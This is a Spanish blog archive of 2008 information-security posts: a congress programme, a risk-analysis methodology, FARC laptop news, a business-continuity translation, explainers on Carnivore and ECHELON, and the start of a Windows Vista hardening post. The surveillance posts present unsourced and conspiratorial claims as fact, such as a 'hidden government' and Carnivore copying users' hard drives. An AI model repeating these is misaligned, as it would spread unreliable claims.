SEGURIDAD INFORMATICA

PARTICIPACIÓN EN EL CONGRESO DE SEGURIDAD INFORMÁTICA

2008-11-03T11:33:00.000-08:00

Ciclo de Conferencias del Congreso de Seguridad en Cómputo 2008
Programa Viernes 26
Descargar
Subir

09:00 - 09:30
Propuesta de método para la gestión de métricas de seguridad de la información Abstract

Centro de Estudios Superiores Navales, SEMAR

Jorge Flores Daza
Jorge Salinas Álvarez
Francisco Salmerón Domínguez
Mario G. López Ávila

09:30 - 10:00
Protección a redes Wireless por perturbación Abstract

Centro de Estudios Superiores Navales, SEMAR

Carlos Ernesto García Rosas
Francisco Eduardo Díaz Silva
Daniel Omar Rodríguez Vargas
Edgar Roberto Castellanos García

http://congreso.seguridad.unam.mx/info/programa2008.dsc

ANALISIS DE RIESGOS

2008-09-29T08:07:00.000-07:00

Titulo:
ANÁLISIS DE RIESGO PRÁCTICO EN TECNOLOGÍAS DE INFORMACIÓN.

Resumen:
El concepto de riesgo está presente en la totalidad de las actividades que realiza el ser humano, por lo que antes de implementar cualquier mecanismo de seguridad (software, hardware, política, etc.) en las Tecnologías de la Información, es necesario conocer la prioridad de aplicación y que tipi de medida puedo aplicar. El análisis de riesgos es el primer paso de la seguridad informática.

Un riesgo es un evento, el cual es incierto y tiene un impacto negativo. Análisis de riesgo es el proceso cuantitativo o cualitativo que permite evaluar los riesgos. Las metodologías de análisis de riesgos existentes describen sus etapas en forma teórica, se presentan pocos ejemplos o es necesario una herramienta para realizarlo, cuyo costo normalmente es elevado. Por lo anterior es necesario establecer una metodología cualitativa práctica para realizar un análisis de riesgos a la áreas de TI, estableciendo el cómo puede ejecutarse el análisis.

Esta descripción practica de un análisis de riesgos cuenta con una base teórica, tomando como base tres metodologías reconocidas, la publicada por el NIST en su docuemento SP 800-30, la metodología FRAAP (Facilitated Risk Analysis and Assessment Process) y MAGERIT de España.

Las etapas de esta metodología y una breve descripción de cada una, se describe a continuación:
1. Declaración del alcance.
En esta primera fase se define el motivo para la realización del análisis, la definición del o los procesos a evaluar.

2. Establecimiento del Equipo.
Definir el personal necesario que participara en el análisis.

3. Entrevistas.
Fase que permite conocer el proceso desde el punto de vista de los dueños y usuarios de la información. Las herramientas pueden ser desde una lluvia de ideas hasta cuestionarios.

4. Identificación de procesos.
Como actividades principales se encuentran la elaboración del árbol de procesos a través de un Modelo Visual, para definir dependencias entre procesos y activos.

5. Identificación de activos.
Derivado del proceso a evaluar se determinan los activos principales.

6. Valoración de procesos y activos (impacto).
El modelo visual determina que proceso, subproceso o activos son determinantes para la ejecución continua del proceso.

7. Identificación amenazas.
8. De acuerdo a cada organización, lugar geográfico y listas previamente elaboradas se deben definir las amenazas que pueden afectar nuestros activos.

9. Priorizar amenazas.
La frecuencia de algunas amenazas están establecidas a través de una formula sencilla en algunas tablas.

10. Determinar riesgo.
La relación entre amenaza-frecuencia- activo-impacto, es la condición principal a tomar en cuenta para determinar el riesgo.

11. Priorización de riesgos.
Las tablas de resultados nos permiten determinar cuales son nuestras prioridades.

12. Determinación de controles.
Existen controles determinados por estándares y metodologías una lista común puede ser de ayuda. El informe final debe determinar el control que se va a aplicar al activo de un proceso por un riesgo determinado.

Bogotá no manipuló la laptop de FARC: Interpol

2008-05-16T10:51:00.000-07:00

Bogotá no manipuló la laptop de FARC: Interpol

Viernes 16 de Mayo de 2008

La Interpol afirmó ayer que las computadoras examinadas por sus expertos pertenecían a las Fuerzas Armadas Revolucionarias de Colombia (FARC) y que no encontró evidencia de que el gobierno de ese país manipulara, modificara, borrara o agregara información a esos equipos. El presidente venezolano Hugo Chávez calificó como una "ridiculez" y un "show de payasos" el informe que entregó Interpol sobre las computadoras confiscadas por Colombia a las FARC, y anunció que someterá a revisión la presencia de Venezuela en esa organización policial internacional.

Ronald Noble, director de Interpol, dijo durante una conferencia de prensa que "estamos completamente seguros de que las evidencias, las computadoras vinieron de un campamento terrorista de las FARC... El señor Reyes está ahora muerto, pero eran definitivamente sus computadoras, sus discos". Las computadoras eran de Raúl Reyes, uno de los siete jefes de las FARC, quien murió en el bombardeo del 1 de marzo al campamento guerrillero en territorio ecuatoriano, cercano a la frontera con Colombia. "No hubo interferencia o alteración de cualquier dato, contenido en los archivos, por parte de cualquier autoridad colombiana tras el decomiso del 1 de marzo", afirmó Noble. Agregó que el informe de la policía internacional es público, pero la decisión de divulgar todos los documentos de los computadores de Reyes es de Bogotá.

El presidente colombiano Álvaro Uribe, al ser consultado en Lima sobre si divulgaría toda la información, se limitó a decir que: "yo creo que lo que se ha dicho es suficiente sobre el tema".

Nicaragua no extraditará a Lucía

El gobierno de Daniel Ortega rechazó ayer la petición de Ecuador para extraditar a Lucía Morett, luego de que se supo la víspera que se abrió en Quito un proceso contra la mexicana, aclaró una fuente oficial.

Morett, junto con otras dos colombianas que sobrevivieron a una incursión militar de Colombia contra un campamento de las FARC en territorio ecuatoriano, el 1 de marzo, se encuentran asiladas en Nicaragua.

La ministra nicaragüense de Gobernación, Ana Isabel Morales, dijo a la estatal Radio Nicaragua que las colombianas Doris Torres Bohórquez y Martha Pérez Gutiérrez, así como Morett, no pueden ser extraditas a Ecuador "bajo ninguna circunstancia", por su condición de asilo.

"El asilo es una figura del derecho humanitario que contempla la protección a las personas que lo solicitan, precisamente cuando son perseguidas políticas", añadió la funcionaria.

El fiscal general de Ecuador, Washington Pesántez, dijo el miércoles que pesa sobre ellas cargos por amenazas a la seguridad del Estado y vínculos con la guerrilla.

Mucha información

Los discos de los computadores registrados por Interpol contienen vasta información --610 gigabytes de datos incluyendo 7,989 direcciones de correo electrónico, 10,537 archivos de video y sonido, 22,481 páginas de internet, 37,872 documentos escritos y 210,888 imágenes.

Sólo 983 de los archivos estaban codificados. Los tres computadores portátiles fueron hallados en maletines metálicos y fueron comprados en Florida, dijo un funcionario colombiano. Indicó que la mayoría de los archivos parece que le llegaban codificados a Raúl Reyes y su asistente Eliana se los abría.

Business Continuity Certification in Higher Education (TRADUCCION)

2008-05-16T10:12:00.000-07:00

Introducción.

¿Cómo su institución haría frente a la destrucción completa de uno de sus edificios principales en el campus y a la pérdida de muchos empleados importantes de la universidad? El día de hoy muchas universidades pueden no ser capaces, de contestar a esta pregunta hoy porque no se han comprometido en la realización del trabajo necesario para la elaboración de planes en caso que se de una situación tan trágica. Aquellas instituciones que pueden contestar esta pregunta, es porque tienen desarrollados sus planes de continuidad del negocio. Esto significa que se han propuesto que cada campus, escuela, universidad o departamento entienda y se prepare para el papel que desempeñará para mantener la institución funcionando, durante e inmediatamente después de una crisis y viable a largo plazo.

Las instituciones que dedican tiempo y recursos al planeamiento de la continuidad del negocio, saben de la importancia de estos planes para proteger la seguridad de sus estudiantes, las facultades y del personal. Reconocen la importancia de la planeación de continuidad del negocio, y tienen individuos con los conocimientos y entrenamiento en caso de un desastre. Se han dado cuenta que la continuidad del negocio debe ser un factor para el establecimiento de políticas, guías prácticas y procedimientos rutinarios, y que todo el personal en la institución debe saber qué a hacer cuando un desastre ocurra.

La planeación de la continuidad del negocio puede ser un concepto difícil de entender. En las organizaciones no siempre es claro, de quien la responsabilidad de este proceso, así como de quién necesita estar implicado en el planeo. Un estudio reciente de ECAR acerca de la planeación de la continuidad del negocio en organización educativa (Yanosky, 2007) ilustra la variedad de directivos de una organización de este tipo que tienen la responsabilidad de la planeación (véase figura 1).

Figura 1. Directivos responsables en la Institución de la continuidad de negocio.

Los informes de la función de continuidad del negocio dependen de cómo está estructurada cada organización. Encontrar el lugar idóneo para la unidad para la continuidad del negocio es un esfuerzo verdadero, el factor de éxito más importante, es que los programas de continuidad del negocio tengan el apoyo de los ejecutivos de alto nivel, así como personal dedicado y debidamente informado para conducir el esfuerzo.

Un importante elemento al que hace frente una organización de educación, así como organizaciones e instituciones de todas las clases, es acerca de cómo los individuos obtendrán el conocimiento sobre la continuidad del negocio para apoyar un programa de esta índole. La certificación de la continuidad del negocio es el principal medio para alcanzar este fin. A través de las investigaciones del Instituto de Recuperación de Desastres (DRI), de los artículos, presentaciones y entrevistas con los profesionales de la continuidad del negocio, esta investigación discute las ventajas, beneficios y costos de la certificación de la continuidad del negocio. También discute las 10 mejores prácticas que son críticas al proceso de la certificación.

Elementos esenciales para la Certificación de la Continuidad del Negocio.

Las definiciones y las distinciones entre la continuidad del negocio y la recuperación del desastre son a veces difíciles de describir. Según el Glosario del Diario de Continuidad del Negocio y Recuperación de Desastres, la continuidad del negocio es: “la capacidad de una organización de proporcionar servicio y soporte a sus clientes y de mantener su viabilidad antes, durante, y después de un acontecimiento de continuidad del negocio”. Un Plan de Continuidad del Negocio (BCP) es “el proceso de desarrollar y de documentar los procedimientos que permiten a una organización responder a un acontecimiento que se presenta por un período de tiempo inaceptable y permite realizar sus funciones críticas después de una interrupción.”

La recuperación de desastres es definida como “la capacidad de una organización de responder a un desastre o una interrupción en sus servicios mediante la implementación de un Plan de Recuperación de Desastres (DRP) para estabilizar y para restaurar las funciones críticas de la organización.” Un plan de Recuperación de Desastres (DRP) es “el documento gerencial aprobado que define los recursos, acciones, tareas y datos requeridos manejar el esfuerzo de la recuperación de la tecnología. Refiere generalmente al esfuerzo de la recuperación de la tecnología. Éste es un componente del Programa de Administración de Continuidad del Negocio.”

En la conferencia de Continuidad del Negocio de EDUCAUSE en agosto de 2006, Ron Yanosky becario de ECAR definio continuidad del negocio como “la capacidad de la institución para mantener o de restaurar su organización y servicios académicos, cuando alguna circunstancia interrumpe las operaciones normales.” La recuperación de desastres se definió como: “las actividades que restauran la institución a una condición aceptable después de sufrir un desastre” – la cual incluye actividades tales como evaluación del riesgo y del impacto, priorización de procesos del negocio y de restauración de operaciones a un nivel “normal”, después de un acontecimiento. En esta definición, la recuperación de desastres se considera como parte de la Continuidad del Negocio (Yanosky, 2006).

El propósito de este documento es centrarse en la planeación de la continuidad del negocio según lo definido por el Consejo de Recuperación de Desastres (Disaster Recovery Journal Advisory) y el DRI como un proceso general para desarrollar y documentar los procedimientos preparatorios en en caso de que se presente una interrupción.

Organismos de Certificación.

En términos generales, la certificación es la evaluación independiente del conocimiento y de las habilidades que la organización o personal que certifica, ha determinado importante para la forma en que se realiza una actividad (Green, 2003). DRI es la más reconocida organización en los Estados Unidos que certifican específicamente a los profesionales de continuidad del negocio.

Existen varias organizaciones fuera de los Estados Unidos que proporcionan certificaciones similares. En el Reino Unido, el Instituto de Continuidad del Negocio (Business Continuity Institute, BCI), en Canadá es el Consorcio Internacional de Certificación de Resilicencia de Negocios (Business Resilience Certification Consortium International, BRCCI). Este documento se basa en certificaciones de DRI internacional.

DRI internacional fue fundado en 1988, con el nombre de Instituto de Recuperación de Desastres, su propósito era desarrollar una base del conocimiento en la planeación de contingencias y la gestión de riesgos. A la fecha DRI proporciona los programas educativos y de certificación para personal involucrado en la práctica de la gestión y planeación de Continuidad del Negocio. Más de 3,500 individuos se encuentran certificados por la DRI.

DRI integra varios criterios para evaluar el nivel mínimo aceptable del conocimiento y experiencia para obtener la certificación.

Roles y prácticas del personal certificado.

DRI publicó en septiembre de 1993, el "Common Body of Knowledge". Desarrollado por expertos reconocidos en la educación y planeación de la continuidad del negocio, el documento proporciona una estándar de la experiencia requerida por los profesionales en el campo. Los 10 temas cubren los siguientes asuntos (DRI, 1997a):

1. Inicio y administración del proyecto. El papel de los profesionales de la continuidad del negocio en esta etapa es conducir a los patrocinadores de proyecto para definir objetivos, políticas y factores críticos del éxito; coordinar y administrar el proyecto de Continuidad del Negocio; supervisar el proceso de Continuidad del Negocio a través de una metodología de control y administración del cambio; defender el proceso ante la gerencia y el personal; desarrollar el plan y presupuesto del proyecto; definir y recomendar a la estructura y administración e implementar el proceso de planeación de Continuidad del Negocio.
2. Evaluación y control del riesgo. El rol en esta actividad, es identificar los riesgos potenciales en la organización; entender cómo reducir y atenuar estos riesgos; identificar si se requiere experiencia externa; identificar el grado de exposición de la organización; identificar las alternativas para la mitigación y/o reducción del riesgo; conforme a la gerencia determinar los niveles aceptables de riesgo y documentar y presentar los resultados.
3. Análisis de impacto en el negocio: Su papel en esta parte es identificar a expertos con amplios conocimientos de las funciones de las diversas áreas; identificar funciones, instalaciones, personal y tecnología de la organización; identificar y definir los criterios de criticidad y obtener la aprobación de la gerencia para los criterios definidos.
4. Desarrollar las Estrategias de Continuidad del Negocio. El rol del profesional es analizar las alternativas disponibles, sus ventajas, desventajas y costos; identificar las estrategias viables de la recuperación para cada área funcional del negocio; consolidar las estrategias; desarrollar las estrategias de la unidad de negocio y obtener el compromiso de la gerencia para las estrategias desarrolladas.
5. Respuesta y operación de emergencias. Identificar los tipos potenciales de respuesta a emergencias; verificar la existencia y ubicación de los procedimientos para respuesta a emergencias, recomendar el desarrollo de tales procedimientos donde no existan; integrar los procedimientos de Continuidad del Negocio y Recuperación de Desastres mediante la respuesta a emergencias y procedimientos escalonados; identificar los controles y ordenes necesarias para el manejo de una emergencia; recomendar el desarrollo de los procedimientos de control para definir roles, autoridades y procesos de comunicación para el manejo de emergencias y asegurar que los procedimientos de respuesta a emergencias cumplan los requisitos de las autoridades públicas.
6. Desarrollar e implementar los Planes de Continuidad del Negocio. Identificar: la metodología del planeación, organización, dirección de esfuerzos y necesidades del personal; controlar el proceso del planeación y producir, implementar, probar y mantener el plan.
7. Programas y entrenamiento de concientización. El papel del profesional es establecer objetivos y componentes del programa de concientización y capacitación; identificar los requisitos de capacitación para las áreas funcionales; desarrollar la metodología del concientización y capacitación; adquirir y desarrollar herramientas para capacitación y concientización e identificar las oportunidades de capacitación y concientización externas o alternativas.
8. Mantener y aplicar los planes de continuidad del negocio. Planear, coordinar y facilitar las prácticas de los planes; evaluar y documentar los resultados de los ejercicios; actualizar el plan; reportar los resultados y evaluaciones a la gerencia; coordinar el plan de mantenimiento y asistir en el establecimiento de un programa de auditoría del plan de continuidad del negocio.
9. Comunicaciones en la crisis. Establecer programas para comunicaciones proactivas en las crisis; establecer la coordinación de la comunicación de la crisis con las agencias externas; establecer la coordinación necesaria de la comunicación de la crisis con los grupos relevantes; y establecer y probar lo medios de comunicación entre la institución y sus unidades de negocio.
10. Coordinación con agencias externas. Identificar y establecer los procedimientos de enlace para el manejo de emergencias; coordinar la administración de emergencias con las agencias externas; y mantener actualizado su conocimiento sobre leyes y regulaciones referentes a la administración de emergencias

FUENTE:
Business Continuity Certification in Higher Education
EDUCAUSE Center for Applied Research
Research Bulletin, Volume 2007, Issue 11, May 22, 2007
Ed Gregory, DePaul University y Cheryl Hover, DePaul University
www.educause.edu/ecar/

¿QUÉ ES CARNIVORE?

2008-04-06T18:23:00.000-07:00

CARNIVORE

Es el nombre de un software usado por el FBI que tiene un fin, pero no un funcionamiento, muy similar a ECHELON.

Este software se instala en los proveedores de acceso a Internet y, tras una petición proveniente de una instancia judicial, rastrea todo lo que un usuario hace durante su conexión a Internet. En teoría tiene capacidad para discernir comunicaciones legales de ilegales.

El cómo realiza este análisis, y cuál es su infraestructura y alcance real, es algo que permanece secreto, pero teniendo la misma procedencia que ECHELON (los EE.UU.) y perteneciendo a una agencia estatal (FBI), al igual que ECHELON (NSA), no sería descabellado el pensar que ambas agencias intercambien, o compartan, toda o parte de la información obtenida.
Su existencia se conoció en el año 2000, por una disputa legal con un ISP que se negaba a instalarlo, y desencadenó las protestas de grupos de libertades civiles de todo el mundo. Se hizo tan popular que hubo quien realizó obras de arte basadas en Carnivore, rebautizado después por el FBI como DCS-1000.

El FBI ha afirmado constantemente que su sistema filtra el tráfico de los datos y conserva solamente los paquetes que la corte ha autorizado a los investigadores. Sin embargo, el FBI ha mantenido el sistema completamente en secreto y no fue hasta el 11 de Julio del 2000 que se descubriese su existencia y la corporación EPIC hizo un seguimiento de los documentos del FBI relacionados con el sistema, al amparo del Acta de Libertad de la Información (FOIA).

EPIC exigió al FBI a que hiciera de público conocimiento todos los expedientes referentes a Carnivore, incluyendo su código de fuente, detalles técnicos y análisis que apuntaban a implicancias potenciales en contra de la privacía.

Después de varias gestiones en la corte y de dos órdenes judiciales, EPIC obtuvo un número de documentos en el 24 de Mayo del 2002. "Estos documentos confirman lo que hemos creído muchos de nosotros por dos años: el sistema Carnivore es una poderosa pero a la vez torpe herramienta que pone en peligro la privacía de inocentes ciudadanos americanos" manifestó David Sobel, asesor principal de EPIC. "ahora sabemos que su imprecisión, también puede poner en riesgo importantes investigaciones, incluyendo aquellas relacionadas con el terrorismo.

Cuando recién se hizo público, nosotros sugerimos que el uso del Carnivore debería ser suspendido hasta que las interrogantes que rodeaban su misterio, finalmente pudiesen ser resueltas. Nuestras demandas legales demuestran que hay mucho sobre el software Carnivore que todavía no sabemos."

La controvertida herramienta creada por el FBI para vigilar las comunicaciones por correo electrónico, Carnivore, es mucho más poderoso de lo que la institución había admitido hasta ahora. En un informe del Centro de Información para la Privacidad Electrónica, los expertos del FBI reconocen que si capacidad para vigilar las actividades de los internautas en la Red es ilimitada.

El FBI asegura que utiliza este programa limitadamente, y sólo siguiendo las órdenes de los tribunales, cuando realiza investigaciones criminales. Esta agencia policial mantiene que "Carnivore" autoelimina la información que no le interesa y no husmea en los ordenadores de todos los internautas sino sólo en los de aquellos que son sospechosos de violar la ley.
Sin embargo, los críticos de este sistema de vigilancia advierten que su poder es ilimitado. "Carnivore" tiene la capacidad de filtrar en busca de determinadas palabras clave millones de mensajes de correo electrónico que viajan por la Red y sin saber que son vigilados.

El programa tiene unas claves, que el FBI mantiene en secreto, que permiten descubrir la información que la agencia policial busca. Estas claves pueden ser palabras, nombres de políticos, de ciudades, y terminología que levante sospechas entre los investigadores del FBI. Cuando uno de estos mensajes es localizado, el programa se introduce en el disco duro del internauta "capturado" y archiva toda su información confidencial, a la espera de que los investigadores determinen si ha cometido algún delito. Incluso antes de un juez les de permiso para hacerlo.

Carnivore era la tercera generación de los sistemas de espionaje de redes del FBI. El primero fue Etherpeek, actualmente un programa comercial. El segundo, Omnivore, usado entre 1997 y 1999 y sustituido por DragonWare y constaba de tres partes: Carnivore, que capturaba la información; Packeteer, que convertía los paquetes interceptados en textos coherentes, y Coolminer, que los analizaba.

El sistema Carnivore provocó muchas controversias por sus fallos, como espiar a la persona equivocada, y porque se usó sin permiso judicial, según los grupos de libertades civiles. La ley USA Patriot acabó con la discusión, al decretar que el FBI podía monitorizar redes sin orden de un juez ni sospechas fundadas, mientras sólo captase la información del tráfico y no su contenido.

A partir de entonces, se habló menos de Carnivore. Por una parte, los ISP monitorizaban sus redes y mandaban los datos al Gobierno. Y por otra parte, floreció el mercado de sistemas comerciales más evolucionados, que sustituyeron a Carnivore.

Un ejemplo de estos programas es el Analizador Semántico de Tráfico de la empresa Narus, supuestamente usado por la Agencia Nacional de Seguridad (NSA). Se instala en diferentes puntos de una red y puede examinar cantidades ingentes de tráfico en tiempo real, identificando los paquetes interesantes, procedentes de correos, mensajería instantánea, vídeos o telefonía IP, aunque viajen a más de 10 Gbps.
El FBI ha decido dar sepultura a "Carnivore", su controvertido programa informático creado para rastrear los correos electrónicos de internautas sospechosos en busca de palabras comprometedoras. Según detalla The Register, la agencia prefiere utilizar software comercial para rastrear el tráfico en la Red.

The Register alude a dos documentos remitidos al Congreso estadounidense –uno correspondiente a 2002 y otro a 2003, ambos en PDF– por el Centro de Información sobre la Intimidad Electrónica en el que se detalla que el FBI no lo utilizó ni en 2002 ni en 2003. Ni a él ni a su otra versión, el "DCS-1000". En su lugar, el departamento recurrió a programas comerciales de rastreo en las trece investigaciones que llevó a cabo durante ese periodo.

Que un ordenador localice palabras en un documento es un juego de niños; pero que entienda el significado de una frase en un correo electrónico o una conversación telefónica es un reto. El Ministerio de Defensa español, junto con Italia y Francia, trabaja en ello desde el proyecto Infraestructura de Inteligencia Semántica Operacional (OSEMINTI), que acaba de ponerse en marcha.

El proyecto OSEMINTI debe lograr, según fuentes del Ministerio, que "los servicios de Inteligencia, por medio de ordenadores, puedan identificar frases con significados concretos en cintas de grabación o en texto escrito y, a su vez, que dichos ordenadores aprendan, con el conocimiento que van generando en su interacción con las personas".

Francia lidera el proyecto, que durará dos años. España contribuye con 1.856.000 euros, el 30% del presupuesto. Según el Ministerio, "el campo natural de OSEMINTI es la inteligencia militar", aunque también otros "ámbitos de defensa y seguridad, tanto civil como militar".
Por su capacidad de entender el significado de un texto interceptado, OSEMINTI es un paso más en la evolución de los sistemas de espionaje telemático, cuyo representante más popular en el campo civil fue Carnivore, usado durante años por el estadounidense Federal Bureau of Investigation (FBI) para monitorizar comunicaciones a través de Internet.

El Ministerio de Defensa no afirma ni desmiente que esté trabajando en un Carnivore europeo: "Será el usuario quien determine el posible uso de la tecnología una vez que se obtengan resultados desarrollados y maduros". En realidad, OSEMINTI no es un Carnivore, sino un paso más.

El problema no es recopilar la información, ni técnica ni legalmente: los operadores europeos tienen la obligación de guardar los datos de tráfico de Internet y telefonía hasta dos años, así como de obedecer las órdenes judiciales de interceptación del contenido de llamadas o comunicación por Internet.

El problema es procesar esta cantidad cada vez más diversa e ingente de datos, procedentes de múltiples fuentes, sobre todo cuando no son datos de tráfico, fácilmente procesables, sino contenidos que deben ser leídos y entendidos. Una tarea que, explica Defensa, "ahora mismo realizan personas, que son las que tienen el conocimiento para identificar frases con un significado concreto".

Para que OSEMINTI asuma la tarea, primero hay que transformar la información interceptada, mediante herramientas de conversión rápida, a un espacio semántico que entiendan las máquinas y demostrar que, explica el Ministerio, "mediante el uso de un lenguaje común entre los datos, información, algoritmos y personas, se mejora la interoperabilidad de diferentes fuentes de información o sistemas de sensores clásicos".

Esto permitirá "diseñar y desplegar sistemas inteligentes, que tengan conocimiento y capacidad de aprender, para la gestión de situaciones complejas en tiempos adecuados".

Lo que llevará al objetivo final: "Sistemas que se transforman debido a la integración de conocimiento procedente de la misión y las personas participantes". Así, el objetivo parece ser no sólo entender la información sino unificar la procedente de diversas fuentes, aunque Defensa no aclara si el proceso se hará "al vuelo", captando los datos en tiempo real, o una vez interceptados.

LA RED “ECHELON”

2008-04-04T09:22:00.000-07:00

LA RED “ECHELON”

Diseñado por la Agencia de Seguridad Nacional de Estados Unidos, ECHELON es el sistema de vigilancia más importante del mundo. Teóricamente se utiliza para escuchar los mensajes enviados por teléfono, fax o correo electrónico desde países considerados enemigos, pero en la práctica cualquiera puede ser su objetivo.

El embrión de la red de espionaje norteamericano data del inicio de la guerra fría, cuando un primer proyecto denominado “Ukusa”, se estableció entre el Reino Unido y Estados Unidos. A estos dos países se unieron Canadá, Australia y Nueva Zelanda. A partir de los años 70, las estaciones de escucha implantadas en estos países empezaron a captar las señales retransmitidas hacia la Tierra por los satélites tipo INTELSAT e Inmarsat. Y un centenar de satélites de observación “escuchan” las ondas: radio, teléfonos móviles, etc.

Los miembros de esta alianza de habla inglesa son parte de la alianza de inteligencia UKUSA, que lleva reuniendo inteligencia desde la Segunda Guerra Mundial. La existencia de ECHELON fue hecha pública en 1976 por Winslow Peck.

En realidad, el nombre "Echelon" sólo designaría a la sección del espionaje de señales (Sigint, Signals Intelligence) dedicada a interceptar las comunicaciones vía satélite. Sin embargo, la literatura actual y los documentos del Parlamento Europeo identifican la parte con el todo, y así denominan "Echelon" a toda la red de espionaje, que en realidad se llama Sistema de Espionaje de Señales de los Estados Unidos (United States Sigint Sistem; USSS). Bajo las siglas USSS se engloban la poderosa Agencia Nacional de Seguridad (NSA) norteamericana, varios departamentos de la CIA y áreas de la Armada y la Fuerza Aérea de los Estados Unidos. A la misma operativa se unen los países integrantes del acuerdo UKUSA. El Reino Unido, como contraparte de los Estados Unidos, vinculó al GCHQ (Government Communications Headquarters), su agencia Sigint, en esta red. Asimismo, las agencias de inteligencia de Canadá, Australia y Nueva Zelanda también están integradas en el mismo sistema, usan los mismos protocolos y colaboran diariamente en las actividades de interceptación, procesado y análisis de la información.

A cada estado dentro de la alianza UKUSA le es asignado una responsabilidad sobre el control de distintas áreas del planeta. La tarea principal de Canadá solía ser el control del área meridional de la antigua Unión Soviética. Durante el período de la guerra fría se puso mayor énfasis en el control de comunicaciones por satélite y radio en centro y Sudamérica, principalmente como medida para localizar tráfico de drogas y secuaces en la región. Los Estados Unidos, con su gran cadena de satélites espías y puertos de escucha controlan gran parte de Latinoamérica, Asia, Rusia asiática y el norte de China. Gran Bretaña intercepta comunicaciones en Europa, Rusia y África. Australia examina las comunicaciones de Indochina, Indonesia y el sur de China, mientras que Nueva Zelanda barre el Pacífico occidental.

En 2001, el Parlamento Europeo constató la existencia de "un sistema de interceptación mundial de las comunicaciones, resultado de una cooperación entre los Estados Unidos, el Reino Unido, Canadá, Australia y Nueva Zelanda".
Por otra parte, todas las redes de comunicación son escuchadas: de los cables submarinos (con captadores instalados por submarinistas especializados) a la red Internet (la vigilancia de la red de redes mundial es particularmente simple: la práctica totalidad de los datos transita por “nudos” situados en territorio norteamericano, incluso cuando se trata de conexiones europeas. De esta forma, cada día millones de fax, de télex, de mensajes y llamadas telefónicas del mundo entero son cribados, escogidos, seleccionados, analizados.

El sistema Echelon, fue concebido como forma de interconectar (todos los sistemas de escucha) para permitirles funcionar como componentes de un todo integrado. Las estaciones de recepción por satélite captan el conjunto de los haces de satélites INTELSAT, la más importante de las cuales esta localizada en Menwith Hill, Inglaterra, situada bajo el control directo de la NSA. Echelon está controlado por la Agencia de Seguridad Nacional (NSA). La clave de la interceptación reposa en potentes ordenadores que escrutan y analizan estas masas de mensajes y extraen los que presentan algún interés.

¿Cómo lo hace?, las estaciones de interceptación reciben los millones de mensajes destinados a las estaciones terrestres legitimas y utilizan ordenadores para descubrir los que contienen direcciones o palabras claves preprogramadas. Direcciones y palabras que los servicios de información se comunican en forma de “diccionarios” que reflejan sus preocupaciones del momento. Basta que, en el curso de un intercambio telefónico, por fax o por correo electrónico, se emitan palabras como “terrorismo”, “droga”, “guerrilla”, o nombres como “Castro”, “Gadafi”, “Sadam Hussein”, etc, para que toda la comunicación sea identificada, retenida, analizada.

Con el avance de la tecnología también se fueron implantando mejoras en el programa "Echelon", que actualmente permite a los países del tratado UKUSA operar sus bases de espionaje vía satélite prácticamente por control remoto. Es el caso, por ejemplo, de la base neozelandesa de Waihopai, como desveló el escritor Nicky Hager en su libro Secret Power, de reciente publicación en Nueva Zelanda. Así pues, sólo desde unas cuantas bases espía se puede controlar el flujo de información interceptada y clasificada por programas de Inteligencia Artificial. Actualmente, analistas y técnicos dominan desde muy pocas bases un trabajo altamente automatizado que antes tenían que desarrollar centenares de especialistas en cada puesto de interceptación. Las bases principales del sistema "Echelon" se encuentran en la sede de la Agencia Nacional de Seguridad (NSA) en Fort George Meade (Maryland, EEUU) y en la base británica de Menwith Hill (al norte del condado de Yorksire, Inglaterra).

Según declaraciones oficiales de la Sede de Comunicaciones Generales (GB) al London observer en 1992, varias organizaciones “inocentes” están en el “Libro Negro” de ECHELON. Es el caso de Amnistía Internacional, Greenpeace y Christian Aid.
ECHELON espía a grupos antiglobalización, movimientos ecologistas o sencillamente, a todos aquellos que promueven un pensamiento crítico y pueden desestabilizar el Gobierno Oculto. Incluso se utiliza a modo particular, en otro artículo publicado por el mismo periódico, un ex empleado del British Joint Intelligence Comité (BJIC), Robin Robinson, admitió que Margaret Thatcher había ordenado a título personal, que se interceptaran las comunicaciones de Lonrho la empresa propietaria del Observer, después de que éste publicara el 1989 un artículo que acusaba a su hijo Mark de haber recibido sobornos en una transacción multimillonaria de armas con Arabia Saudita. A pesar de que se enfrentaba a una acusación por traición, Robinson confesó que él había enviado mensajes interceptados de Lonrho a la oficina de la Sra. Thatcher. Ejemplos claros de que ECHELON no sólo se utiliza para espiar a los potenciales enemigos, sino también a las personas o grupos que resultan molestos a ese poder establecido.

La revista británica New Scientist de mayo del 2001 en un reportaje describe cómo la red ECHELON puede usarse para interceptar transmisiones de satélite y cables submarinos para espiar a Europa. Según el investigador y experto en espionaje Nicky Hager, existe un programa gratuito de encriptación que se puede descargar de Internet (http://www.pgpi.org) y que protege suficientemente los correos electrónicos de los ojos de ECHELON.

Puede que por todo esto, los gobiernos europeos estén preparando su propio servicio secreto: ENFOPOL. En noviembre de 1998 la revista electrónica alemana Telépolis denunció la creación de una red de espionaje a semejanza de ECHELON en Europa que parece asociarse claramente con el nacimiento de ENFOPOL y que persigue los mismos fines que el programa norteamericano. El establecimiento del servicio ENFOPOL fue ratificado por todos los países miembros de la Unión Europea en 1995, aunque ninguno de ellos lo confirme o desmienta y aunque no haya habido ningún tipo de debate público al respecto. En este sentido, el pasado 7 de mayo fue aprobada una resolución relativa a la interceptación legal de las comunicaciones por el Paramento Europeo. Esta resolución, no tiene carácter obligatorio pero todo apunta a que un grupo de países la adoptaría formando un “espacio ENFOPOL” que irá aumentando a medida que más países vayan integrándose en dicho espacio.

ENFOPOL intentará imponer sus normas a todos los operadores europeos en telefonía fija y móvil que deberán facilitar a esta policía secreta europea un acceso total a las comunicaciones de sus clientes, así como información sobre números marcados y números desde los que se llama. En el caso de Internet, los proveedores deberán facilitar “una puerta trasera”(backdoor) para que ENFOPOL pueda penetrar en sistemas privados a sus anchas. Evidentemente estos proveedores estarán obligados, además, a informar sobre los datos personales de su cliente, datos de correo electrónico y claves privadas. La información que proporcionen tampoco podrán hacerla pública así como a quién se la proporcionen. Todo ello, sin que sea imprescindible o necesaria una orden judicial.

HARDENING WINDOWS VISTA

2008-03-07T09:39:00.000-08:00

I. INTRODUCCIÓN.
Windows Vista la última versión de Windows creada por Microsoft, esta vez se trata de una versión más segura, fiable y potente que Windows jamás había tenido antes.
La nueva versión de Windows, denominada "Windows Vista", es un sistema operativo (software) que tiene un gran potencial y está pensado para ofrecer una experiencia más segura, más fiable y de mayor potencial; los usuarios pueden utilizar los equipos con mayor eficacia y confianza, estar en contacto con los demás y además divertirse.
